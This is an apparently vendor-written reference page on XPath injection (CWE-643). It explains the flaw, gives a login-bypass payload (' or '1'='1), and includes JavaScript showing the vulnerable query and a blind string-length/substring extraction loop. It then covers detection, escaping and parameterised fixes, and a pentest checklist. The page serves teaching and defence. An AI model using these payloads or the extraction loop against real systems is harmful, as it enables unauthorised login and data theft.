XPath Injection
detect, understand, remediate

XPath injection manipulates queries against XML data stores by injecting filter syntax through unsanitised input. Login forms backed by XML user files, configuration lookups, and legacy enterprise apps that rely on XQuery or XPath expressions can leak the full document, bypass authentication, or surface admin-only nodes when input is concatenated into the query string.

Severity

High

CWE ID

CWE-643

OWASP Top 10

A03:2021 - Injection

CVSS 3.1 Score

9.1

What is XPath injection?

XPath injection (CWE-643) is an injection attack against applications that build XPath or XQuery expressions from user input without proper escaping. When an application stores data in XML files or queries an XML database, and constructs the lookup expression by concatenating untrusted input into the query string, an attacker can inject XPath syntax to alter the query logic, bypass authentication, or read parts of the document the application never intended to expose.

XPath is the query language for navigating XML documents, similar in spirit to how SQL queries a relational database. Where SQL injection manipulates a relational query, XPath injection manipulates the path expression that selects nodes from an XML tree. The same root cause applies: unparameterised string concatenation gives an attacker partial control over the syntax of the query, and the data store evaluates whatever the application hands it.

XPath injection still appears in pentests against legacy enterprise applications, XML-backed authentication forms, configuration management systems, content publishing pipelines, and integrations with SOAP services that lean on XPath inside business logic. The class is closely related to LDAP injection and NoSQL injection: the syntax differs but the root cause and the impact pattern are the same.

How it works

Find an XML-backed input

The attacker identifies endpoints that consume XML, expose user search, run XML-based authentication, or lean on configuration lookups against an XML file or database.

Probe with quote and predicate breaks

Single quotes, double quotes, brackets, and parentheses are sent in form fields and parameters. Verbose XPath errors, blank responses, or shifted result sets reveal that the input is concatenated into a query rather than escaped.

Inject the predicate manipulation

A payload such as a closing quote followed by an always-true condition (for example ' or '1'='1) rewrites the XPath predicate so that it no longer depends on the original filter and can match every node the expression selects.

Bypass auth or extract the document

The reshaped query authenticates as the first user in the file, extracts admin-only nodes, or, in blind cases, lets the attacker walk the document one character at a time using string-length and substring comparisons.

A worked example

The pattern is easiest to read against an XML user file used for login. The application stores users in a document like the one below.

<users>
  <user>
    <name>alice</name>
    <password>s3cret</password>
    <role>user</role>
  </user>
  <user>
    <name>admin</name>
    <password>r00tpw</password>
    <role>admin</role>
  </user>
</users>

The login handler concatenates the submitted username and password into an XPath expression that fetches a matching user node.

// Vulnerable: string-concatenated XPath
const expr = "//user[name/text()='" + username +
             "' and password/text()='" + password + "']";
const match = doc.evaluate(expr, doc, null, XPathResult.ANY_TYPE, null);

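An attacker submits ' or '1'='1 as both the username and the password. The query is rebuilt as:

//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']

In XPath, and binds more tightly than or, so the predicate groups as name/text()='' or ('1'='1' and password/text()='') or '1'='1'. The final '1'='1' makes it true for every user node. Injecting the payload into the username alone is not enough here, because the trailing password comparison would still have to hold. Applications typically take the first node in the result, so the attacker is authenticated as the first user in the document. The same shape covers blind XPath injection, where the attacker uses string-length and substring functions to enumerate nodes one character at a time when the application only confirms whether a query matched anything.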
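
The rewrite can be replayed without an XML engine by repeating the handler's concatenation and printing the resulting expression. The sketch below is illustrative only: buildLoginExpr is a hypothetical helper name that mirrors the vulnerable handler above, and the grouping noted in the comments follows XPath operator precedence, where and binds more tightly than or.

```javascript
// Hypothetical helper mirroring the vulnerable concatenation in the handler.
function buildLoginExpr(username, password) {
  return "//user[name/text()='" + username +
         "' and password/text()='" + password + "']";
}

const payload = "' or '1'='1";

// Benign input keeps the intended shape: one name test AND one password test.
console.log(buildLoginExpr("alice", "s3cret"));
// //user[name/text()='alice' and password/text()='s3cret']

// Payload in the username only. Because `and` binds tighter than `or`, this
// groups as: name='' or ('1'='1' and password='anything'), so it still
// depends on the password comparison.
console.log(buildLoginExpr(payload, "anything"));
// //user[name/text()='' or '1'='1' and password/text()='anything']

// Payload in both fields: the trailing `or '1'='1'` makes the whole
// predicate true for every user node.
console.log(buildLoginExpr(payload, payload));
// //user[name/text()='' or '1'='1' and password/text()='' or '1'='1']
```

Printing the expression for each test payload is a cheap way to check which grouping the parser will actually see before sending anything to the target.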

Common causes

String concatenation in XPath expressions

Building XPath or XQuery expressions by gluing user input directly into the query string. The same anti-pattern that produces SQL injection produces XPath injection in XML-backed apps.

XML files used as auth or config stores

Legacy applications that authenticate against an XML user file, or that read business rules from XML configuration, often pre-date the move to parameterised queries and have never been refactored.

XQuery and SOAP endpoints

XQuery against processors and native XML databases (Saxon, BaseX, MarkLogic), and SOAP services that evaluate XPath inside their handlers, expose the same class of bug under a different name.

Verbose XPath error messages

Default error pages that surface the raw XPath expression and the parser exception give attackers the exact syntax to manipulate, accelerating exploitation from probe to working payload.

How to detect it

Automated detection

SecPortal's code scanning flags string-concatenated XPath, XQuery, and SOAP query construction in source so the bug is caught before the application ships.
Authenticated DAST sends quote-breaking, predicate-injecting, and boolean-shifting payloads against form inputs and parameters, then compares responses for length, status, and timing differences that suggest filter manipulation.
Error fingerprinting catches XPath-specific exceptions (parser errors, expected token messages, namespace warnings) leaking through default error handlers, which usually means the input reaches an unparameterised query.
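
The response comparison described above can be sketched as a small differential check. This is a minimal illustration, not SecPortal's implementation: the response shape ({ status, body }), the function name responsesDiverge, and the 5% length tolerance are all assumptions chosen for the example.

```javascript
// Compare two responses obtained with an always-true and an always-false
// payload. A difference in status, or a body-length difference beyond the
// tolerance, suggests the payload changed the query result.
function responsesDiverge(trueResp, falseResp, tolerance = 0.05) {
  if (trueResp.status !== falseResp.status) return true;
  const a = trueResp.body.length;
  const b = falseResp.body.length;
  const longest = Math.max(a, b);
  if (longest === 0) return false; // both bodies empty: nothing to compare
  return Math.abs(a - b) / longest > tolerance;
}

// Example with hand-written responses (hypothetical data).
const withTrue = { status: 200, body: "<li>alice</li><li>admin</li>" };
const withFalse = { status: 200, body: "" };
console.log(responsesDiverge(withTrue, withFalse)); // true
```

A tolerance is used rather than strict equality because dynamic pages often vary by a few bytes between requests (timestamps, tokens) even when the query result is unchanged.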

Manual testing

Submit a single quote, then a double quote, in every input that drives a lookup or login. A 500 response, a verbose XPath error, or a shifted result set is the first signal the input is concatenated into the query.
Try an always-true predicate such as ' or '1'='1 and an always-false predicate such as ' or '1'='2. A diverging response between the two confirms the predicate is reaching the parser.
For blind cases, use string-length() and substring() in the predicate to walk a target node one character at a time, validating each guess against a true or false response shape.
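
The blind technique in the last step reduces to two loops over a true/false oracle. The sketch below is an offline illustration under stated assumptions: extractValue, mockOracle, the candidate alphabet, and the target path //user[1]/password are hypothetical, and the oracle is a stand-in that answers from a known string rather than a live request. Only string-length() and substring() are standard XPath functions.

```javascript
// Candidate characters to try at each position (an assumption for the sketch).
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";

// `oracle(condition)` must return true when the injected XPath condition
// held and false otherwise. In a real test it would wrap an HTTP request;
// here it is a parameter so the logic can be exercised offline.
function extractValue(oracle, targetPath, maxLength = 64) {
  // Step 1: find the length with string-length().
  let length = -1;
  for (let n = 0; n <= maxLength; n++) {
    if (oracle(`string-length(${targetPath})=${n}`)) { length = n; break; }
  }
  if (length < 0) return null; // length not found within maxLength

  // Step 2: recover each character with substring() (1-based positions).
  let value = "";
  for (let pos = 1; pos <= length; pos++) {
    const hit = [...ALPHABET].find(
      (ch) => oracle(`substring(${targetPath},${pos},1)='${ch}'`)
    );
    value += hit === undefined ? "?" : hit; // "?" marks a character outside ALPHABET
  }
  return value;
}

// Stand-in oracle that answers from a known string instead of a live target.
function mockOracle(secret) {
  return (condition) => {
    const len = condition.match(/^string-length\(.+\)=(\d+)$/);
    if (len) return secret.length === Number(len[1]);
    const sub = condition.match(/^substring\(.+,(\d+),1\)='(.)'$/);
    if (sub) return secret[Number(sub[1]) - 1] === sub[2];
    return false;
  };
}

console.log(extractValue(mockOracle("s3cret"), "//user[1]/password")); // s3cret
```

Keeping the oracle as a parameter separates the extraction logic from the transport, so the same loop can be validated offline before it is pointed at an in-scope target.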

How to fix it

Use parameterised XPath APIs

Most XPath implementations support variable bindings. In Java, javax.xml.xpath supports XPathVariableResolver, registered through XPath.setXPathVariableResolver. In .NET, XPathExpression.SetContext accepts a custom XsltContext whose ResolveVariable method returns an IXsltContextVariable. In XQuery, declare external variables and bind them at execution time. Pass user input as a bound variable (for example $username) rather than embedding it in the expression string.

Escape on the way in if you cannot parameterise

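When a legacy library does not support binding, build the string literal defensively. XPath 1.0 string literals have no escape syntax, and character references such as &#39; are resolved by an XML parser rather than by the XPath engine, so they do not protect an expression assembled in application code. Wrap the value in whichever quote character it does not contain, or use XPath concat() to assemble values that contain both; XPath 2.0 and later also accept a doubled delimiter ('' inside a single-quoted literal). Strict allowlists on input characters are a defensible last resort, but escaping or parameterising is preferable.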
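
The concat() approach can be sketched as a small helper that turns any string into a valid XPath 1.0 string literal. The function name xpathLiteral is hypothetical, and the sketch assumes the result is spliced into an expression exactly where a quoted literal would otherwise be written.

```javascript
// Turn an arbitrary string into a valid XPath 1.0 string literal.
function xpathLiteral(value) {
  const s = String(value);
  if (!s.includes("'")) return "'" + s + "'";   // no single quote: '...'
  if (!s.includes('"')) return '"' + s + '"';   // no double quote: "..."
  // Both quote types present: split on ' and rejoin the pieces with a
  // double-quoted "'" inside concat().
  const pieces = s.split("'").map((p) => "'" + p + "'");
  return "concat(" + pieces.join(", \"'\", ") + ")";
}

console.log(xpathLiteral("alice"));          // 'alice'
console.log(xpathLiteral("' or '1'='1"));    // "' or '1'='1"
console.log(xpathLiteral(`O'Neil "Jr"`));    // concat('O', "'", 'Neil "Jr"')

// The value now stays inside a single literal.
const expr = "//user[name/text()=" + xpathLiteral("' or '1'='1") + "]";
console.log(expr); // //user[name/text()="' or '1'='1"]
```

With the helper in place, the injection payload is compared as data: the expression looks for a user whose name is literally ' or '1'='1 and matches nothing.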

Validate input against a tight schema

Reject input that violates an explicit type or length contract before it reaches the query. A username field that accepts XPath syntax characters is a missing input contract, not a query bug. Validate at the boundary where the input first arrives, in addition to building the query safely.
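
A contract of this kind can be as small as one anchored pattern. The rule below (3 to 32 characters drawn from letters, digits, dot, underscore, and hyphen) is a hypothetical example, not a recommendation for any particular system; isValidUsername and USERNAME_PATTERN are illustrative names.

```javascript
// Hypothetical contract: 3 to 32 characters; letters, digits, dot, underscore, hyphen.
const USERNAME_PATTERN = /^[A-Za-z0-9._-]{3,32}$/;

function isValidUsername(input) {
  return typeof input === "string" && USERNAME_PATTERN.test(input);
}

console.log(isValidUsername("alice"));        // true
console.log(isValidUsername("' or '1'='1"));  // false
console.log(isValidUsername("a"));            // false
```

The pattern is an allowlist: it names what is accepted rather than trying to enumerate dangerous characters, so quotes, brackets, and parentheses are rejected without being listed.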

Suppress verbose error output

Default exception handlers should not return parser errors, namespace mismatches, or evaluation traces to the user. Log them server-side. Verbose XPath errors are often the difference between a probe and a working exploit.
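
One way to apply this is a thin wrapper around the lookup that logs the exception and returns a generic message. The sketch below assumes a caller-supplied query function and logger; guardedLookup, runQuery, and the response shape are hypothetical names for illustration.

```javascript
// Run a lookup and keep parser details out of the client-facing response.
// `runQuery` and `log` are supplied by the caller (hypothetical signatures).
function guardedLookup(runQuery, log = console.error) {
  try {
    return { ok: true, result: runQuery() };
  } catch (err) {
    // Full detail goes to the server-side log only.
    log("XPath lookup failed:", err);
    // The caller sees a generic message with no expression or stack trace.
    return { ok: false, error: "Request could not be processed." };
  }
}

// Example: a query function that throws a parser-style error.
const response = guardedLookup(() => {
  throw new SyntaxError("Expected token ']' at position 31");
}, () => {}); // logger silenced for the example
console.log(response); // { ok: false, error: 'Request could not be processed.' }
```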

Move sensitive data off plain XML files

Authentication and authorisation rules stored as flat XML are a long-standing anti-pattern. Migrating to a hashed credential store (or, at minimum, a database with parameterised queries) eliminates the exposure XPath injection trades on, and removes the legacy file from the threat model entirely.

Reporting an XPath injection finding

XPath injection findings carry the most weight when the report names the exact endpoint, the input that reached the query, the payload that demonstrated the predicate manipulation, and the data the manipulated query returned. A finding written as "XPath injection in login form" with no payload and no extracted node is hard for engineering to reproduce and easy to dispute. A finding written with the request, the response, and the proof-of-concept extraction reads as a working exploit.

On a SecPortal engagement, the finding sits on the engagement record with the affected endpoint, the CVSS 3.1 vector (typically high to critical depending on what the document holds), the CWE-643 mapping, the request and response evidence, and the remediation guidance. Pentest engagement records keep the proof of concept and the retest verification on the same finding, so the close-out conversation references the original payload rather than reconstructing it from email. The finding triage workflow covers how to separate scanner-derived signals from manually validated XPath findings during the testing window.

Compliance impact

OWASP Top 10

A03:2021 Injection

OWASP ASVS

V5.3 Output Encoding and Injection Prevention

PCI DSS

Req. 6.2 Secure Development Practices

ISO 27001

A.8.28 Secure Coding Practices

A pentester checklist for XPath injection

The list below is the minimum coverage a tester should walk before declaring an XML-backed surface clear of XPath injection.

Inventory every input that reaches an XML data store, an XQuery endpoint, or a SOAP service that uses XPath inside its handlers.
Probe each input with quote and bracket characters, then look for parser errors, blank responses, status changes, or shifted result sets.
Test always-true and always-false predicates side by side. A diverging response shape is the strongest signal for an exploitable filter.
For blind cases, build a string-length and substring oracle and walk the document one character at a time. Capture the full extracted node as evidence.
Where authentication is XML-backed, verify whether the predicate manipulation also returns the password node, the role, or the session attributes the application uses for authorisation.
Record the CVSS vector, the CWE-643 mapping, the request and response evidence, and the affected file path or service so the finding is reproducible at retest.

Related vulnerabilities

SQL Injection

LDAP Injection

NoSQL Injection

XML External Entity (XXE) Injection

Authentication Bypass
